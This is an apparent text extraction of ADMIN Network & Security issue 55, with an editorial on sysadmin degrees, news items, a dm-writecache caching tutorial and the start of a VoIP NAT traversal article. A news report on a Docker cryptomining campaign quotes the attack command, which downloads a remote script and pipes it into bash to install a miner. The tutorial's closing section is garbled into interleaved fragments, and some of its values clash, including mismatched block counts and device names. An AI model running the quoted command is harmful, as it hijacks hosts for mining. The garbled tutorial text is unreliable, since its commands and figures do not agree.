ADMIN Network & Security
Issue 55

On the cover:
• AWS Lambda: Scale up and save with serverless monitoring in the cloud
• dm-writecache: Improve random write throughput to slow disks
• Secure Public/Private Cloud: Ansible Playbooks + AWS scripts
• Exchange Hybrid Agent: Migrating mailboxes to Exchange Online
• Optimizing Storage: Finding new bottlenecks in the age of fast storage
• Regex Vulnerabilities: Avoiding the dreaded ReDoS
• nftables: Better performance, simpler syntax
• Performance Dojo: Benchmarking tools
• Prowler: AWS security tool
• Free DVD: openSUSE Leap 15.1

WWW.ADMIN-MAGAZINE.COM
Welcome to ADMIN

Educating a Sys Admin


Education is important, but is it important in technology-related fields? The widely held opinion is that education is not as important for techies.
I recently had a friendly debate with a colleague about whether system administrators need a degree. By degree, we meant an associate's, bachelor's, master's, or other equivalent educational certificate from an accredited college or university. Spoiler: We both agreed that a degree isn't required. However, the debate didn't end there because, in my opinion, professionals who are in professional positions should have a degree.
Now, having said that, I've never heard of a degree program in system administration – at least not at the bachelor's level or beyond. Some two-year programs offer system administration as part of their IT-related curriculum, but I know of no formal computer information systems (CIS), management information systems (MIS), information systems (IS), or information technology (IT) degree programs in system administration. To be perfectly clear, we were discussing Linux system administration, but I'm not sure the reference platform matters.
My argument was that entry-level admins don't need a degree, but most companies offer tuition assistance, and any non-degreed professional should be required to obtain a degree as part of the hiring contract. As I told him, I've worked with degreed and non-degreed sys admins and managers. I believe I even had senior managers or director-level managers who held no degrees. To my surprise, they got the jobs and managed (no pun intended) to maintain themselves in their respective positions. Unfortunately, during the 1990s, one could bluff one's way into a good IT or IT management job with no experience. It also helped to have friends in certain positions, but that's another story – perhaps for my memoir.
His argument was that he doesn't see a need for IT personnel at any level to have a degree. He didn't offer any explanation. I think part of my colleague's opinion comes from the fact that he came into the IT field from far outside of it – just as I did. If you were born before 1990, you probably came to IT from another discipline because the job market was wide open and not enough people with a background in managing computer systems could be found to fill the jobs. Plus, the only IT-related degrees available were for programming. The whole IT, IS, MIS, CIS, Cyber Security degree thing started in the 1990s and later.
My opinion comes from my own history and experience with degreed vs. non-degreed professionals in IT, and let me state here that I'm not sure it really matters from what field you came to IT. I've worked with people from a variety of professions. One person had a PhD in physics, one was an electrical engineer, one had been a secretary, one had been an office assistant, one was a mechanic, one was a videographer, and I was a chemist. So, the IT field is full of people from diverse backgrounds.
In fact, I'll make an even more controversial statement here by stating that the best IT people I've ever worked with didn't have any educational background in IT, IS, MIS, and so on. They were all degreed and very smart people, but none had a related degree. I'm not sure an IT-related degree is great for the more technical positions, but certainly you want people who are analytical and technical. Yes, I know there are people who are self-educated who can meet those criteria, and they can work well with others with a positive attitude. My point is that a degree plus technical and analytical skills set a person apart from the tech hobbyist and techie wannabes.
My best advice is to educate yourself through certification courses, college courses, and online training opportunities. If you're lucky enough to score an IT job without a degree, go for it, but also go for a degree. Negotiate education as part of your hiring contract if your employer doesn't do so. You'll never regret getting an education, and you'll never have to apologize or make excuses for not having one. To summarize, I think education is important and everyone in a professional technical or managerial IT position should have a formal education to some degree. And yes, I know what I did there.
Ken Hess • Senior Editor

Table of Contents

ADMIN Network & Security

Features
This issue emphasizes performance tuning, tweaking, and adaptations with various tools and techniques.
10 dm-writecache: This Linux kernel module lets you gain a noticeable improvement in random write throughput writing to slower disk devices.
16 VoIP and NAT: Secure transparent IP address transitions through NAT firewalls and gateways for Voice over IP.
22 SchedViz: Visualize how the Linux kernel scheduler allocates jobs among cores and the performance consequences.

Tools
Save time and simplify your workday with these useful tools for real-world systems administration.
26 Exchange Hybrid Agent: Ease migration from a local Exchange environment to Exchange Online.
30 Rook: Ceph distributed storage and Kubernetes container orchestration come together.

Containers and Virtualization
Virtual environments are becoming faster, more secure, and easier to set up and use. Check out these tools.
36 FAI.me: If you are looking for a way to build images quickly and easily, FAI.me is the place to go.
42 New S3 Services at Amazon: Amazon has new storage classes that address different usage profiles.
46 Prowler for AWS Security: An AWS security best practices assessment, auditing, hardening, and forensics readiness tool.

News
Find out about the latest ploys and toys in the world of information technology.
8 News:
• Canonical now offers an Ubuntu Pro image for AWS
• Vulnerable Docker instance sought out by Monero malware
• Cumulus Networks enhances their network-specific Linux
• SUSE adds SUSE Linux Enterprise to the Oracle Cloud Infrastructure

Security
Use these powerful security tools to protect your network and keep intruders in the cold.
52 Regex Vulnerabilities: Regular expressions are invaluable for checking data, but a vulnerability could make them ripe for exploitation.
54 nftables: The latest packet filter implementation promises better performance and simpler syntax and operation.

16 VoIP and NAT: Correct mapping of internal to external IP addresses is essential to enable unhindered VoIP communication through NAT gateways and firewalls.

46 Prowler for AWS Security: With the use of just a handful of Prowler's many features, you can test against industry-consensus benchmarks from the Center for Internet Security (CIS).

Management
Use these practical apps to extend, simplify, and automate routine admin tasks.
60 Loki: Grafana's Loki is a good replacement candidate for the Elasticsearch, Logstash, and Kibana (ELK) combination in Kubernetes environments.
64 Serverless Uptime Monitoring: Monitoring with AWS Lambda serverless technology reduces costs and scales to your infrastructure automatically.
70 Ansible Hybrid Cloud: Extending your data center temporarily into the cloud during a customer rush might not be easy, but it can be done, thanks to Ansible's Playbooks and some AWS scripts.

Nuts and Bolts
Timely tutorials on fundamental techniques for systems administrators.
78 Profiling Python Code: Profiling – as a whole or by function – shows where you should spend time speeding up your programs.
88 Fibre Channel SAN Bottlenecks: Discover the possible bottlenecks in Fibre Channel storage area networks and learn how to resolve them.
92 initramfs and dracut: If your Linux system is failing to boot, the dracut tool can be a convenient way to build a new RAM disk.

Service
3 Welcome
4 Table of Contents
6 On the DVD: openSUSE Leap 15.1, 64-bit (see p. 6 for details)
94 Performance Tuning Dojo: Your sensei reveals three of his favorite benchmarking tools: time, hyperfine, and bench.
98 Call for Papers


On the DVD

openSUSE Leap 15.1 (Install Version, NOT Live)

openSUSE Leap is a community distribution that shares a common code base with SUSE Linux Enterprise (SLE) and coordinates with SLE releases (i.e., SLE is also in version 15). SUSE recommends Leap for "Sysadmins, Enterprise Developers, and 'Regular' Desktop Users." Please note that the image on this DVD is not the Live version and will try to install the new operating system.
• Released December 2019
• Gnome or KDE (Plasma 5.12) desktop, as well as lightweight options
• Appropriate for traditional and software-defined infrastructure
• Comprehensively tested for hardened codebase

Resources
[1] openSUSE Leap 15.1: [https://software.opensuse.org/distributions/leap/15_1]
[2] Release notes: [https://doc.opensuse.org/release-notes/x86_64/openSUSE/Leap/15.1/]
[3] Product flyer: [https://www.suse.com/media/flyer/opensue_leap_built_to_scale_and_to_exceed_your_expectations_flyer.pdf]

DEFECTIVE DVD?
Defective discs will be replaced; email cs@admin-magazine.com.
While this ADMIN magazine disc has been tested and is to the best of our knowledge free of malicious software and defects, ADMIN magazine cannot be held responsible and is not liable for any disruption, loss, or damage to data and computer systems related to the use of this disc.


News for Admins

Tech News
Canonical Now Offers an Ubuntu Pro Image for AWS
Ubuntu rules the cloud. According to The Cloud Market (https://thecloudmarket.com/stats#/by_platform_definition), Ubuntu is the most widely deployed image on the Amazon Elastic Compute Cloud (with nearly 370K images deployed). Not one to be satisfied with being at the top of the digital heap, Canonical (https://canonical.com/) – the company behind Ubuntu (https://ubuntu.com/) – has released a new version of their venerable Ubuntu platform.
Ubuntu Pro was created specifically for Amazon Web Services. The new image takes the standard Canonical Ubuntu Amazon Machine Image and layers security and compliance subscriptions on top of it. Specifically, Ubuntu Pro includes:
• Up to 10 years of package and security updates for Ubuntu 18.04, and up to eight years for 14.04
and 16.04
• Kernel Livepatch for continuous security patching without reboots
• Customized FIPS and Common Criteria EAL-compliant components (for environments that re-
quire FedRAMP, PCI, HIPAA, and ISO compliance)
• Patch coverage for Ubuntu’s infrastructure and app repositories for all types of open source services
• System management with Landscape
• Integration with AWS security and compliance features, such as AWS Security Hub and AWS
CloudTrail (applicable from 2020)
• Subscriptions available for Ubuntu Advantage support packages (https://ubuntu.com/support)
Ubuntu Pro is available via the AWS Marketplace (https://aws.amazon.com/marketplace/search/results?x=0&y=0&searchTerms=ubuntu+pro), and prices range from free to $0.33 per hour (for software plus AWS usage fees).

Vulnerable Docker Instance Sought Out by Monero Malware


Near the end of November it was discovered that some Docker instances were vulnerable to a specific attack vector (https://www.zdnet.com/article/a-hacking-group-is-hijacking-docker-systems-with-exposed-api-endpoints/) that would allow the injection of Monero mining programs. During the two days the targeted campaign was live, more than 14.82 Monero (XMR) was mined. That amount translates to roughly $800.
Although that amount wasn't enough to turn heads, what was significant in this vulnerability was the number of scans that occurred. During that campaign, hackers scanned up to 59,000 IP networks for exposed API endpoints. Once attackers located an exposed endpoint, an Alpine Linux OS container was deployed to run the command

chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;'

(which downloads a bash script that would install the XMRig cryptocurrency miner).
The issue was discovered by security firm Bad Packets LLC. Bad Packets also found that the malware contained a self-defense measure that not only disables security but also shuts down processes associated with rival cryptocurrency-mining botnets.

To avoid such a vulnerability, Troy Mursch (cofounder and chief research officer of Bad Packets LLC) says Docker container admins should immediately check to see if they are exposing API endpoints to the Internet. If so, admins should close exposed ports and stop/delete any unrecognized containers.
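A quick way to see whether a host is even listening on the conventional Docker API ports (2375 for plain TCP, 2376 for TLS) is to check the local sockets and then review the running containers. These commands are a generic illustration of that advice, not part of the Bad Packets advisory:

# Is dockerd listening on the TCP API ports?
$ sudo ss -tlnp | grep -E ':(2375|2376) '

# Review running containers and remove anything you do not recognize
$ docker ps --format '{{.ID}}  {{.Image}}  {{.Command}}'
$ docker stop <container-id> && docker rm <container-id>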

Cumulus Networks Enhances Their Network-Specific Linux


Cumulus Linux is a full-featured Linux operating system designed specifically for the networking
industry. Cumulus supports a wide array of networking hardware (https://cumulusnetworks.com/products/
hardware-compatibility-list/) and is fully compliant with the Open Compute Project’s networking specifi-
cation (including the Open Network Install Environment).
With the release of Cumulus Linux 4.0, there are a number of changes,
so make sure you are informed before you upgrade.
First and foremost, Cumulus Linux 4.0 is now based on Debian
Buster (version 10) and includes the Linux 4.19 kernel. Along with this
kernel, Meltdown and Spectre fixes are finally (and fully) up to date.
The next most important advancement for Cumulus Linux is the
integration of switchdev. Switchdev is an open source in-kernel ab-
straction model that provides a standardized method of programming
switch ASICs and speeds up development time.
Cumulus Linux 4.0 has added a few new supported platforms,
such as Edgecore Minipack AS8000 (100G Tomahawk 3), Mellanox
SN3700C (100G Spectrum-2), Mellanox SN3700 (200G Spectrum-2),
and HPE SN2345M (100G Spectrum).
Other new features in Cumulus Linux include the ability to upgrade to a specific kernel release with apt-get, EVPN BUM traffic handling (using PIM-SM on Broadcom switches), PIM active-active with MLAG, port security on Broadcom switches, WJH support on Mellanox switches (to stream detailed, contextual telemetry for off-box analysis), a new backup and restore utility, the merge of the FRRouting daemons and daemons.conf files into the daemons file, Zebra enabled by default (in the daemons file), MAC learning disabled by default on all VXLAN bridge ports, and much more.
Read about all of the new changes to Cumulus Linux online (https://support.cumulusnetworks.com/hc/en-
us/articles/360038231814-What-s-New-and-Different-in-Cumulus-Linux-4-0-0?mobile_site=true).

SUSE Adds SUSE Linux Enterprise to the Oracle Cloud Infrastructure


SUSE (a Gold-level member of Oracle PartnerNetwork) recently announced that SUSE Linux Enterprise is now a part of Oracle Cloud Infrastructure. This move also brings Oracle into the ever-growing membership of the SUSE Partner Program for Cloud Service Providers.
Both SUSE Linux Enterprise and SUSE Linux Enterprise Server for SAP Applications will allow
customers to leverage high performance virtual machines and bare metal compute for Linux-based
workloads. According to Naji Almahmoud, SUSE VP of Global Alliances, “SUSE’s collaboration
with Oracle Cloud Infrastructure allows us to meet growing customer demand for the agility and
cost benefits of cloud-based business-critical applications....”
Via a bring-your-own-subscription arrangement, SUSE customers will be able to transfer existing
SUSE subscriptions to Oracle Cloud Infrastructure, so they can deploy new workloads or
migrate existing workloads from their current data center to Oracle
Cloud. There will be no additional cost imposed by SUSE for this
new addition, and customers will be able to continue taking ad-
vantage of their existing relationship with SUSE support.
Vinay Kumar, VP of Product Management, Oracle Cloud Infra-
structure, said, “SUSE Linux Enterprise Server on Oracle Cloud
Infrastructure offers enterprises more choice as they transition to
the cloud.” Kumar added, “Oracle and SUSE have a common goal of
providing open and reliable infrastructure to support our customers’
digital transformation.”


Linux device mapper writecache

Kicking It Into Overdrive

With the dm-writecache Linux kernel module, you can gain a noticeable improvement in random write throughput when writing to slower disk devices. By Petros Koutoupis

The idea of block I/O caching isn't revolutionary, but it still is an extremely complex topic. Technically speaking, caching as a whole is complicated and a very difficult solution to implement. It all boils down to the I/O profile of the ecosystem or server on which it is being implemented. Before I dive right in, I want to take a step back, so you understand what I/O caching is and what it is intended to address.

What Is I/O Caching?

A computer cache is a component (typically leveraging some sort of performant memory) that temporarily stores data for current write and future read I/O requests. In the event of write operations, the data to be written is staged and will eventually be scheduled and flushed to the slower device intended to store it. As for read operations, the general idea is to read it from the slower device no more than once and maintain that data in memory for as long as it is still needed. Historically, operating systems have been designed to enable local (and volatile) random access memory (RAM) to act as this temporary cache. Although it performs at stellar speeds, it has its drawbacks:


• It is expensive.
• Capacities are small.
• More importantly, it is volatile. If power is removed from RAM, data is lost.
As unrealistic as it might seem, the ultimate goal is never to touch the slower device storing your data with either read or write I/O requests (Figure 1). Fortunately, other forms of performant, cheap, high-density, and persistent memory devices exist that do not perform as fast as RAM but that do still perform extremely well – enough so that I will demonstrate their use in the following exercise with noticeable results.

Figure 1: The data performance gap as you move further away from the CPU.

Using I/O Caching

Solid State Drives (SSDs) brought performance to the forefront of computing technologies, and their adoption is increasing not only in the data center but also in consumer-grade products. Unlike their traditional spinning hard disk drive (HDD) counterparts, SSDs comprise a collection of computer chips (non-volatile NAND memory) with no movable parts. Therefore SSDs are not kept busy seeking to new drive locations and, in turn, introducing latency. As great as this sounds, SSDs are still more expensive than HDDs. HDD prices have settled to around $0.03/GB; SSD prices vary but sit at around $0.13-$0.15/GB. At scale, that price gap makes a world of difference. To keep costs down and still invest in the needed capacities, one logical solution is to buy a large number of HDDs and a small number of SSDs and enable the SSDs to act as a performant cache for the slower HDDs.

Common Methods of Caching

In this discussion, note that target refers to the backing store (i.e., the slower HDD). However, you should understand that the biggest pain point for a slower HDD is not accessing sectors sequentially for read and write workloads; it is random workloads and, to be more specific, random small I/O workloads that are the issue. The purpose of a cache is to alleviate a lot of the burden for the drive to seek new sector locations for 4K, 8K, or other small I/O requests. Some of the more common caching methods or modes are:
• Writeback caching. In this mode, newly written data is cached but not immediately written to the destination target.
• Write-through caching. This mode writes new data to the target while still maintaining it in cache for future reads.
• Write-around caching or a general-purpose read cache. Write-around caching avoids caching new write data and instead focuses on caching read I/O operations for future read requests.
Many userspace libraries, tools, and kernel drivers exist to enable high-speed caching. I will describe some of those more commonly used before eventually diverting attention to just dm-writecache.

dm-cache

The dm-cache component of the Linux kernel's device mapper has been around for quite some time – at least since 2006. It originally made its debut not in the kernel itself but as a research project developed by Dr. Ming Zhao through his summer internship at IBM Research. The dm-cache module was integrated into the Linux kernel tree as of version 3.9. It is an all-purpose caching module and is written and designed to run all of the above caching methods, with the exception of write-around caching.

bcache

Very similar to dm-cache, bcache too is a Linux kernel driver, although it differs in a few ways. For instance, the user is able to attach more than one SSD as a cache, and it is designed to reduce write amplification by turning random write operations into sequential writes.
Write amplification is an undesirable phenomenon wherein the amount of information physically written to the SSD is a multiple of the logical amount intended to be written. In the short term, the effects of write amplification are not felt immediately, but in the long term, as the medium begins to enforce its programmable erase (PE) cycles to make way for new write data, the life of each NAND cell is reduced.

dm-writecache

Fairly new to the Linux caching scene, dm-writecache was officially merged into the 4.18 Linux kernel.


Unlike the other caching solutions mentioned already, the focus of dm-writecache is strictly writeback caching and nothing more: no read caching, no write-through caching. The thought process for not caching reads is that read data should already be in the page cache, which makes complete sense.

Other Caching Tools

Tools earning honorable mention include:
• RapidDisk. This dynamically allocatable memory disk Linux module uses RAM and can also be used as a front-end write-through and write-around caching node for slower media.
• Memcached. A cross-platform userspace library with an API for applications, Memcached also relies on RAM to boost the performance of databases and other applications.
• ReadyBoost. A Microsoft product, ReadyBoost was introduced in Windows Vista and is included in later versions of Windows. Similar to dm-cache and bcache, ReadyBoost enables SSDs to act as a cache for slower HDDs.

Working with dm-writecache

The only prerequisites for using dm-writecache are to be on a Linux distribution running a 4.18 kernel or later and to have a version of Logical Volume Manager 2 (LVM2) installed at v2.03.x or above. I will also show you how to enable a dm-writecache volume without relying on the LVM2 framework and instead manually invoke dmsetup.

Identifying and Configuring Your Environment

Identifying the storage volumes and configuring them is a pretty straightforward process (Listing 1).

Listing 1: Storage Volumes

$ cat /proc/partitions
major minor     #blocks  name
   7     0        91264  loop0
   7     1        56012  loop1
   7     2        90604  loop2
 259     0    244198584  nvme0n1
   8     0    488386584  sda
   8     1         1024  sda1
   8     2    488383488  sda2
   8    16   6836191232  sdb
   8    32   6836191232  sdc

In my example, I will be using both /dev/sdb and /dev/nvme0n1. As you might have already guessed, /dev/sdb is my slow device, and /dev/nvme0n1 is my NVMe fast device. Because I do not necessarily want to use my entire SSD (the rest could be used as a separate standalone or cached device elsewhere), I will place both the SSD and HDD into a single LVM2 volume group. To begin, I label the physical volumes for LVM2:

$ sudo pvcreate /dev/nvme0n1
  Physical volume "/dev/nvme0n1" successfully created.
$ sudo pvcreate /dev/sdb
  Physical volume "/dev/sdb" successfully created.

Then, I verify that the volumes have been appropriately labeled (Listing 2).

Listing 2: Volume Labels

$ sudo pvs
  PV           VG  Fmt  Attr PSize    PFree
  /dev/nvme0n1     lvm2 ---  <232.89g <232.89g
  /dev/sdb         lvm2 ---    <6.37t   <6.37t

Next, I add both volumes into a new volume group labeled vg-cache,

$ sudo vgcreate vg-cache /dev/nvme0n1 /dev/sdb
  Volume group "vg-cache" successfully created

verify that the volume group has been created as seen in Listing 3, and verify that both physical volumes are within it, as in Listing 4.

Listing 3: Volume Group Created

$ sudo vgs
  VG       #PV #LV #SN Attr   VSize VFree
  vg-cache   2   0   0 wz--n- 6.59t 6.59t

Listing 4: Physical Volumes Present

$ sudo pvs
  PV           VG       Fmt  Attr PSize   PFree
  /dev/nvme0n1 vg-cache lvm2 a--  232.88g 232.88g
  /dev/sdb     vg-cache lvm2 a--   <6.37t  <6.37t

Say I want to use 90 percent of the slow disk: I will carve a logical volume labeled slow from the volume group, use that slow device,


$ sudo lvcreate -n slow -l90%FREE vg-cache /dev/sdb
  Logical volume "slow" created.

and verify that the logical volume has been created (Listing 5).

Listing 5: Slow Logical Volume Created

$ sudo lvs vg-cache -o+devices
  LV   VG       Attr       LSize  Pool Origin Data% Meta% Move Log Cpy%Sync Convert Devices
  slow vg-cache -wi-a----- <5.93t                                                   /dev/sdb(0)

Using the fio benchmarking utility, I run a quick test with random write I/Os to the slow logical volume and get a better understanding of how poorly it performs (Listing 6).

Listing 6: Test Slow Logical Volume

$ sudo fio --bs=4k --ioengine=libaio --iodepth=32 --size=10g --direct=1 --runtime=60 \
  --filename=/dev/vg-cache/slow --rw=randwrite --numjobs=1 --name=test
test: (g=0): rw=randwrite, bs=(R) 4096B-4096B, (W) 4096B-4096B, (T) 4096B-4096B, ioengine=libaio, iodepth=32
fio-3.1
Starting 1 process
Jobs: 1 (f=1): [w(1)][100.0%][r=0KiB/s,w=1401KiB/s][r=0,w=350 IOPS][eta 00m:00s]
test: (groupid=0, jobs=1): err= 0: pid=3104: Sat Oct 12 14:39:08 2019
  write: IOPS=352, BW=1410KiB/s (1444kB/s)(82.8MiB/60119msec)
[ ... ]
Run status group 0 (all jobs):
  WRITE: bw=1410KiB/s (1444kB/s), 1410KiB/s-1410KiB/s (1444kB/s-1444kB/s), io=82.8MiB (86.8MB), run=60119-60119msec

I see an average throughput of roughly 1.4MiBps (1410KiBps). Although that number is not great, it is expected when sending a number of small random writes to an HDD. Remember, with mechanical and movable components, a large percentage of the time is spent seeking to new locations on the disk platters. If you recall, this method introduces latency and will take much longer for the disk drive to return with an acknowledgment that the write is persistent to disk.
Now, I will carve out a 10GB logical volume from the SSD and label it fast,

$ sudo lvcreate -n fast -L 10G vg-cache /dev/nvme0n1

verify that the logical volume has been created (Listing 7), and verify that it is created from the NVMe drive (Listing 8).

Listing 7: Fast Logical Volume Created

$ sudo lvs
  LV   VG       Attr       LSize  Pool Origin Data% Meta% Move Log Cpy%Sync Convert
  fast vg-cache -wi-a----- 10.00g
  slow vg-cache -wi-a-----  5.93t

Listing 8: Fast Logical Volume Created from NVMe Drive

$ sudo lvs vg-cache -o+devices
  LV   VG       Attr       LSize  Pool Origin Data% Meta% Move Log Cpy%Sync Convert Devices
  fast vg-cache -wi-a----- 10.00g                                                   /dev/nvme0n1(0)
  slow vg-cache -wi-a-----  5.93t                                                   /dev/sdb(0)

Like the example above, I will run another quick fio test with the same parameters as earlier (Listing 9).

Listing 9: fio Test

$ sudo fio --bs=4k --ioengine=libaio --iodepth=32 --size=10g --direct=1 --runtime=60 \
  --filename=/dev/vg-cache/fast --rw=randwrite --numjobs=1 --name=test
test: (g=0): rw=randwrite, bs=(R) 4096B-4096B, (W) 4096B-4096B, (T) 4096B-4096B, ioengine=libaio, iodepth=32
fio-3.12
Starting 1 process
Jobs: 1 (f=1): [w(1)][100.0%][w=654MiB/s][w=167k IOPS][eta 00m:00s]
test: (groupid=0, jobs=1): err= 0: pid=1225: Sat Oct 12 19:20:18 2019
  write: IOPS=168k, BW=655MiB/s (687MB/s)(10.0GiB/15634msec); 0 zone resets
[ ... ]
Run status group 0 (all jobs):
  WRITE: bw=655MiB/s (687MB/s), 655MiB/s-655MiB/s (687MB/s-687MB/s), io=10.0GiB (10.7GB), run=15634-15634msec

Wow! You can see a night and day difference here of about 655MiBps throughput.
If you have not already, be sure to load the dm-writecache kernel module:

$ sudo modprobe dm-writecache
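As a quick sanity check (not part of the original walk-through), you can confirm that the running kernel now offers the writecache target before moving on:

$ sudo dmsetup targets | grep writecache

If the command prints a writecache entry, the target is available; if it prints nothing, the module did not load.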
To enable the writecache volume via LVM2, you will first need to deactivate both volumes to ensure that nothing is actively writing to them. To deactivate the SSD, enter:

$ sudo lvchange -a n vg-cache/fast

To deactivate the HDD, enter:

$ sudo lvchange -a n vg-cache/slow


Now, convert both volumes into a single cache volume,

$ sudo lvconvert --type writecache --cachevol fast vg-cache/slow

activate the new volume,

$ sudo lvchange -a y vg-cache/slow

and verify that the conversion took effect (Listing 10).

Listing 10: Conversion

$ sudo lvs -a vg-cache -o devices,segtype,lvattr,name,vgname,origin
  Devices          Type        Attr        LV             VG        Origin
  /dev/nvme0n1(0)  linear      Cwi-aoC---  [fast]         vg-cache
  slow_wcorig(0)   writecache  Cwi-a-C---  slow           vg-cache  [slow_wcorig]
  /dev/sdd(0)      linear      owi-aoC---  [slow_wcorig]  vg-cache

Now it's time to run fio (Listing 11).

Listing 11: Run fio

$ sudo fio --bs=4k --ioengine=libaio --iodepth=32 --size=10g --direct=1 --runtime=60 \
  --filename=/dev/vg-cache/slow --rw=randwrite --numjobs=1 --name=test
test: (g=0): rw=randwrite, bs=(R) 4096B-4096B, (W) 4096B-4096B, (T) 4096B-4096B, ioengine=libaio, iodepth=32
fio-3.12
Starting 1 process
Jobs: 1 (f=1): [w(1)][100.0%][w=475MiB/s][w=122k IOPS][eta 00m:00s]
test: (groupid=0, jobs=1): err= 0: pid=1634: Mon Oct 14 22:18:59 2019
  write: IOPS=118k, BW=463MiB/s (485MB/s)(10.0GiB/22123msec); 0 zone resets
[ ... ]
Run status group 0 (all jobs):
  WRITE: bw=463MiB/s (485MB/s), 463MiB/s-463MiB/s (485MB/s-485MB/s), io=10.0GiB (10.7GB), run=22123-22123msec

At about 460MiBps, it's almost 330 times faster than the plain old HDD. This is awesome. Remember, the NVMe is a front-end cache to the HDD, and although all writes are hitting the NVMe, a background thread (or more than one) schedules flushes to the backing store (i.e., the HDD).
If you want to remove the volume, type:

$ sudo lvconvert --splitcache vg-cache/slow

Now you are ready to map the NVMe drive as the writeback cache for the slow spinning drive with dmsetup (in the event that you do not have a proper version of LVM2 installed). To invoke dmsetup, you first need to grab the block count of the slow device:

$ sudo blockdev --getsz /dev/vg-cache/slow
12744687616

You will plug this number into the next command and create a writecache device mapper virtual node called wc with a 4K blocksize:

$ sudo dmsetup create wc --table "0 78151680 writecache s /dev/vg-cache/slow /dev/vg-cache/fast 4096 0"

Assuming that the command returns without an error, a new (virtual) device node will be accessible from /dev/mapper/wc. This is the dm-writecache mapping. Now you need to run fio again, but this time to the newly created device (Listing 12).

Listing 12: Run fio to New Device

$ sudo fio --bs=4k --ioengine=libaio --iodepth=32 --size=10g --direct=1 --runtime=60 \
  --filename=/dev/mapper/wc --rw=randwrite --numjobs=1 --name=test
test: (g=0): rw=randwrite, bs=(R) 4096B-4096B, (W) 4096B-4096B, (T) 4096B-4096B, ioengine=libaio, iodepth=32
fio-3.12
Starting 1 process
Jobs: 1 (f=1): [w(1)][100.0%][eta 00m:00s]
test: (groupid=0, jobs=1): err= 0: pid=7055: Sat Oct 12 19:09:53 2019
  write: IOPS=34.8k, BW=136MiB/s (143MB/s)(9.97GiB/75084msec); 0 zone resets
[ ... ]
Run status group 0 (all jobs):
  WRITE: bw=136MiB/s (143MB/s), 136MiB/s-136MiB/s (143MB/s-143MB/s), io=9.97GiB (10.7GB), run=75084-75084msec

Although it isn't near the standalone NVMe speeds, you can see a wonderful improvement in random write operations. At 90 times the original HDD performance, you observe a throughput of 136MiBps. I am not entirely sure what parameters are not being configured for the volume during the dmsetup create to match that of the earlier LVM2 example, but this is still pretty darn good.
To remove the device mapper cache mapping, you first need to flush forcefully (and manually) all pending write data to disk:

$ sudo dmsetup message /dev/mapper/wc 0 flush
the HDD). NVMe speeds, you can see a wonderful cache to other, slower devices on
If you want to remove the volume, improvement of random write opera- your system. Q
type: tions. At 90 times the original HDD per-
formance, you observe a throughput of
$ sudo lvconvert --splitcache vg-cache/slow 136MiBps. I am not entirely sure what The Author
parameters are not being configured for Petros Koutoupis is currently a senior perfor-
Now you are ready to map the NVMe the volume during the dmsetup create mance software engineer at Cray for its Lustre
drive as the writeback cache for the to match that of the earlier LVM2 ex- High Performance File System division. He is
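As a rough sketch of that idea (assuming a second slow disk such as the /dev/sdc shown in Listing 1, which is not otherwise used in this article), the remaining NVMe space could back a second writecache volume in the same volume group:

# Add the second slow disk to the volume group and carve a slow volume from it
$ sudo pvcreate /dev/sdc
$ sudo vgextend vg-cache /dev/sdc
$ sudo lvcreate -n slow2 -l 90%PVS vg-cache /dev/sdc

# Carve another small cache volume from the NVMe drive and attach it
$ sudo lvcreate -n fast2 -L 10G vg-cache /dev/nvme0n1
$ sudo lvchange -a n vg-cache/fast2
$ sudo lvchange -a n vg-cache/slow2
$ sudo lvconvert --type writecache --cachevol fast2 vg-cache/slow2
$ sudo lvchange -a y vg-cache/slow2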
slow spinning drive with dmsetup ample, but this is still pretty darn good. also the creator and maintainer of the Rapid-
(in the event that you do not have a To remove the device mapper cache Disk Project. Petros has worked in the data
proper version of LVM2 installed). To mapping, you first need to flush storage industry for well over a decade and has
invoke dmsetup, you first need to grab forcefully (and manually) all pending helped to pioneer many of the technologies
the block count of the slow device: write data to disk: unleashed in the wild today.


Transparent SIP communication with NAT

Number, Please

We show you how to secure transparent IP address transitions through NAT firewalls and gateways for Voice over IP. By Mathias Hein

Mapping internal IP addresses to external IP addresses is essential for Voice over IP (VoIP) communications through network address translation (NAT) gateways and firewalls. Session Initiation Protocol (SIP) is the signaling protocol for establishing VoIP connections; however, SIP-based communications have problems working through firewalls and session border controllers, and all too often, VoIP calls or some unified communications functions fail because of NAT. In this article, I show you how IT managers can resolve these issues with the session traversal utilities for NAT (STUN), traversal using relays around NAT (TURN), and Interactive Connectivity Establishment (ICE) techniques to ensure transparent transitions and improve overall SIP security.

NAT Characteristics

Some years ago, the limited availability of IP addresses led to the development of various strategies by the Internet Engineering Task Force (IETF) for covering a wide environment with the available addresses. One of the intermediate solutions, called NAT (RFC 3022) [1] or PAT (port and address translation), uses conversion between private and public IP addresses. NAT uses tables to assign the IP addresses of a private (internal) network to public IP addresses (Figure 1). The internal IP addresses remain hidden.

Figure 1: NAT links the internal network with the Internet through the translation of IP addresses.


NAT services exchange the sender and receiver IP addresses in the IP header. The simplest form of address conversion is known as static NAT. Address translation converts a private IP address sent from a private address space into a public IP address to be received in a public address space. In the reply packet, this conversion takes place in reverse order. The types of NAT systems include:
• Full cone NAT: IP address conversion takes place independently of a previous outbound connection on the basis of fixed address entries. Every user of the external network can send their packets to the public IP port. The packets are automatically forwarded from the NAT system to the computer with the corresponding address.
• Restricted cone: Address mapping is only performed if it was triggered by an outgoing connection. If an internal computer sends its packets to an external computer, the NAT system uses mapping to translate the client address. The external computer can then send its packets directly back to the internal client (via address mapping). However, the NAT system blocks all incoming packets from other senders.
• Port-restricted cone: Similar to restricted cone NAT, address mapping only takes place if it was triggered by an outgoing connection (identified by the IP and port address).
• Symmetric cone: Fundamentally different from the NAT mechanisms described so far, mapping from the internal to the public IP port address depends on the target IP address of the packet to be transmitted. For example, if a client with the address pair 10.0.0.1:8000 is transmitting to external computer B, address mapping is performed to the external address pair 202.123.211.25:12345. If the same client sends its packets from the same port (10.0.0.1:8000) to a different destination address (computer A), it is mapped to the address 202.123.211.25:45678. The external hosts (A and B) can only send their packets to the respective NAT mapping address. Any attempt by an external machine to send the packets to another address mapping will result in the packets being dropped.

PAT Mechanisms

The PAT mechanism maps all IP addresses of a private network to a single public IP address (Figure 2). In this way, a completely private network only needs a single registered public IP address. Some manufacturers also refer to the PAT function as "hidden NAT." In practice, if two internal computers share an external IP address on the basis of the private IP addresses, an address conflict inevitably occurs. If both internal computers communicate simultaneously with external communication partners, the NAT component must decide to which internal computer the received packet will be forwarded. Because the routing or forwarding decision is based only on the IP addresses integrated into the IP header, this problem cannot be solved.

Figure 2: PAT translates all internal IP addresses into just one public IP address.

